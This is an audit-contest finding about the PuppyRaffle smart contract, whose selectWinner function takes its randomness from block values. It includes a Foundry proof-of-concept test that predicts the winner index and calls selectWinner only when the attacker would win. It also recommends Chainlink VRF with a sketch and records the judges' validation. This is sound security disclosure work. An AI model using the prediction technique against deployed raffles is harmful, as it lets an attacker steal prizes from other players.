Submission Details
Severity: high
Valid

selectWinner function has weak source of randomness

Summary

The selectWinner function uses a weak block-based pseudo-random number generator to select the winner and the token rarity. This allows a malicious user to wait for the right conditions to become the winner.

Vulnerability Details

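Weak block-based PRNG: the winner index is a hash of the caller's address, block.timestamp and block.difficulty, reduced modulo the number of players, as reproduced in the PoC below.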

Impact

Users can use this to easily win.

PoC using Foundry (forge test)

    function testGauranteeWin() public playersEntered {
        // Move past the raffle duration so selectWinner() can be called.
        vm.warp(block.timestamp + duration + 1);
        vm.roll(block.number + 1);
        uint256 playersLength = 4;
        uint256 playerOneIndex = puppyRaffle.getActivePlayerIndex(playerOne);
        for (uint256 i = 0; i < 100; i++) {
            // Try successive prevrandao values (what block.difficulty returns post-Merge).
            vm.prevrandao(bytes32(i));
            // Recompute the winner index with playerOne as the caller.
            uint256 winnerIndex =
                uint256(keccak256(abi.encodePacked(playerOne, block.timestamp, block.difficulty))) % playersLength;
            if (playerOneIndex == winnerIndex) {
                // Call selectWinner() only when the predicted index is playerOne's.
                vm.prank(playerOne);
                puppyRaffle.selectWinner();
                assertEq(puppyRaffle.previousWinner(), playerOne);
                break;
            }
        }
    }

Tools Used

  • Foundry

  • Slither

Recommendations

  • Do not use block values such as block.timestamp and block.difficulty as sources of randomness.

  • Use Chainlink VRF to generate random numbers.
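
The Chainlink VRF recommendation above, sketched as an added example (not PuppyRaffle's or the submitter's code): the draw is split into a request and a coordinator callback, so msg.sender, block.timestamp and block.difficulty no longer feed the result. The contract name, state variables and the constants 3 and 200_000 are assumptions; the inline interface mirrors Chainlink VRF v2's requestRandomWords, and production code would normally inherit Chainlink's VRFConsumerBaseV2 instead of hand-writing the callback check.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
// Minimal slice of Chainlink's VRF v2 coordinator interface, declared inline (no package needed).
interface IVRFCoordinatorV2 {
    function requestRandomWords(
        bytes32 keyHash, uint64 subId, uint16 minimumRequestConfirmations,
        uint32 callbackGasLimit, uint32 numWords
    ) external returns (uint256 requestId);
}
// Hypothetical raffle: names are illustrative; entrance fee and NFT minting are omitted.
contract VrfRaffleSketch {
    IVRFCoordinatorV2 private immutable coordinator;
    bytes32 private immutable keyHash; // gas lane, network-specific (assumed config)
    uint64 private immutable subId;    // funded VRF subscription (assumed config)
    address[] public players;
    address public previousWinner;
    uint256 public lastRarityRoll;     // 0..99, would drive token rarity
    uint256 public pendingRequestId;
    bool public drawPending;

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId) {
        coordinator = IVRFCoordinatorV2(_coordinator);
        keyHash = _keyHash;
        subId = _subId;
    }

    function enter() external {
        require(!drawPending, "draw in progress"); // freeze entrants while a draw is in flight
        players.push(msg.sender);
    }

    // Step 1: only request randomness; no caller- or block-controlled value feeds the outcome.
    function selectWinner() external {
        require(players.length > 0, "no players");
        require(!drawPending, "draw in progress");
        drawPending = true;
        pendingRequestId = coordinator.requestRandomWords(keyHash, subId, 3, 200_000, 2);
    }

    // Step 2: the coordinator calls back with the verified random words.
    function rawFulfillRandomWords(uint256 requestId, uint256[] memory words) external {
        require(msg.sender == address(coordinator), "only coordinator");
        require(drawPending && requestId == pendingRequestId, "unknown request");
        previousWinner = players[words[0] % players.length];
        lastRarityRoll = words[1] % 100; // separate word, so rarity is independent of the winner
        delete players;
        drawPending = false;
    }
}
```

Because the result arrives in a later transaction from the coordinator, a caller can no longer precompute the winner index and submit only when it is favourable, which is what the PoC relies on.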

Updates

Lead Judging Commences

Hamiltonite Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

weak-randomness

Root cause: bad RNG
Impact: manipulate winner
